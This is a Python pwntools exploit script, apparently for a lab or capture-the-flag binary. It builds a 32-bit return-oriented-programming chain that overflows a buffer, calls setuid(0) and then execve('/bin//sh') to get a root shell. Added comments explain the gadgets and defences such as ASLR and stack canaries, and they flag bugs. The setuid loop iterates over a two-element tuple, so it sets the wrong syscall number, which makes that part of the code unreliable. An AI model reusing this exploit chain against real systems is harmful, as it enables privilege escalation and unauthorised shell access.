- #!/usr/bin/python
- from pwn import *
- #from subprocess import call
def main():
    """Assemble a 32-bit x86 ROP payload, print it and write it to ``./test``.

    Every gadget and data address below is hard-coded, so the chain is tied to
    the single binary image they were taken from (presumably a non-PIE build
    running without address randomisation -- not verifiable from this file).
    From a defensive standpoint that is the weak point of this technique:
    PIE + ASLR makes fixed addresses stale, and a stack canary would catch the
    overwrite of the saved return address before any gadget runs; NX/DEP alone
    does not help, because the chain only reuses code already in the image.

    The payload is built as a Python 2 ``str`` (``p32`` output and string
    literals are joined with ``+=``, and ``print`` is a statement), so the
    script is not Python 3 compatible as written.

    Side effects: prints the payload to stdout and writes it to ``test`` in the
    current directory. Returns nothing.
    """
    # 1094205761 found at offset: 112
    # Distance from the start of the overflowed buffer to the saved return
    # address, as recorded by the author (presumably from a pattern search).
    offset = 112
    # 0x08049453 : xor eax, eax ; ret
    xor_eax = p32(0x08049453)
    # 0x0807a65f : inc eax ; ret
    inc_eax = p32(0x0807a65f)
    # 0x080d5e5d : inc ebx ; ret
    inc_ebx = p32(0x080d5e5d)
    # 0x080d5b4f : inc ecx ; ret
    inc_ecx = p32(0x080d5b4f)
    # 0x0805cd67 : inc edx ; ret
    inc_edx = p32(0x0805cd67)
    # 0x0806f27c : nop ; nop ; nop ; int 0x80
    int_80 = p32(0x0806f27c + 4)
    # 0x080546ab : mov dword ptr [edx], eax ; ret
    mov_to_addr_edx_from_eax = p32(0x080546ab)
    # 0x0806ec7a : pop edx ; ret
    pop_edx = p32(0x0806ec7a)
    # 0x080b7fc6 : pop eax ; ret
    pop_eax = p32(0x080b7fc6)
    # 0x080de6b1 : pop ecx ; ret
    pop_ecx = p32(0x080de6b1)
    # 0x080481c9 : pop ebx ; ret
    pop_ebx = p32(0x080481c9)
    # 0x080481b2 : ret
    # NOTE(review): the value assigned here is the pop ebx address from the
    # line above, not the 0x080481b2 named in the comment; `ret` is never
    # appended to either chain, so this mismatch has no effect.
    ret = p32(0x080481c9)
    # 080ea060 l d .data 00000000 .data
    # A writable, fixed-address location (.data) used as scratch space for
    # the "/bin//sh" string; two 4-byte stores are needed because each
    # `mov [edx], eax` writes one dword.
    bin_addr = p32(0x080ea060)
    sh_addr = p32(0x080ea060 + 4)
    bin_sh = bin_addr # Refers to the whole '/bin//sh' string
    # execve(const char *pathname, char *const argv[], char *const envp[])
    # eax ebx ecx edx esi
    # 0x0b char __user * char __user *__user * char __user *__user * struct pt_regs *
    # Writes bin to bin_addr
    rop_shell = ""
    rop_shell += pop_edx # Pops the next value(bin_addr) to the edx register
    rop_shell += bin_addr # bin_addr to be stored in the edx register
    rop_shell += pop_eax # Pops the next value, "/bin" to the eax register
    rop_shell += "/bin" # "/bin" to be stored in the eax register
    rop_shell += mov_to_addr_edx_from_eax # Moves the "/bin" string to the address in edx register
    # Writes sh to sh_addr
    rop_shell += pop_edx # Pops the next value(sh_addr) to the edx register
    rop_shell += sh_addr # sh_addr to be stored in the edx register
    rop_shell += pop_eax # Pops the next value, "//sh" to the eax register
    rop_shell += "//sh" # "//sh" to be stored in the eax register
    rop_shell += mov_to_addr_edx_from_eax # Moves the "//sh" string to the address in edx register
    # Sets eax to 0x0b
    # 0xb = 11
    # The syscall number is reached by zeroing eax and incrementing, rather
    # than popping it, because a popped 0x0000000b would put NUL bytes in the
    # payload (the author's note below says the payload goes through strcpy).
    rop_shell += xor_eax # Zero-ing eax register
    for i in range(1, 12): # Increments eax until its value is 0xb(11) is reached
        rop_shell += inc_eax # Increments eax register by 1
    # Stores the address of "/bin//sh" in ebx
    rop_shell += pop_ebx # Pops the next value(bin_sh) to the ebx register
    rop_shell += bin_sh # bin_sh to be stored in the ebx register
    # Sets ecx to 0
    rop_shell += pop_ecx # Pops the next value(0xffffffff) to the ecx register
    rop_shell += p32(0xffffffff) # We can't directly store null value since strcpy will fail
    rop_shell += inc_ecx # 0xffffffff + 0x1 = 0x00000000
    # Sets edx to 0
    rop_shell += pop_edx # Pops the next value(0xffffffff) to the edx register
    rop_shell += p32(0xffffffff) # We can't directly store null value since strcpy will fail
    rop_shell += inc_edx # 0xffffffff + 0x1 = 0x00000000
    # Do a syscall execve("/bin/sh", 0, 0)
    # Eax : 0xb , Ebx: "/bin/sh", Ecx: 0, Edx: 0
    rop_shell += int_80
    # eax ebx
    # 0x17 old_uid_t uid
    # Sets eax to 0x17(23)
    rop_setuid = ""
    rop_setuid += xor_eax # Zero-ing the eax register
    # NOTE(review): the iterable on the next line is a two-element tuple,
    # not a range, so the body does not execute the number of times the
    # trailing comment describes.
    for i in (1, 24): # Increments eax register from 0 till its value is 0x17(23) is reached
        rop_setuid += inc_eax # Increments eax register by 1
    # Sets ebx to 0
    rop_setuid += pop_ebx # Pops the next value(0xffffffff) to the ebx register
    rop_setuid += p32(0xffffffff) # We can't directly store null value since strcpy will fail
    rop_setuid += inc_ebx # 0xffffffff + 0x1 = 0x00000000
    # Do a syscall setuid(0)
    # Eax: 0x17 , Ebx: 0
    rop_setuid += int_80
    # Joins the initial payload with ROP's
    # Order matters: the setuid chain runs first and falls through, via its
    # final `ret`, into the execve chain appended after it.
    payload = "A" * offset # Padding buffer with junk till offset
    payload += rop_setuid
    payload += rop_shell
    print payload # Display payload in console
    # Writes payload to file for debugging purposes
    fname = 'test'
    with open(fname, 'w') as f:
        f.write(payload)
    # Executes exploit via call : unstable
    # Workaround: ./vuln $(cat test)
    # call(["./vuln", payload])
if __name__ == '__main__':
    # Script entry point: build, print and save the payload.
    main()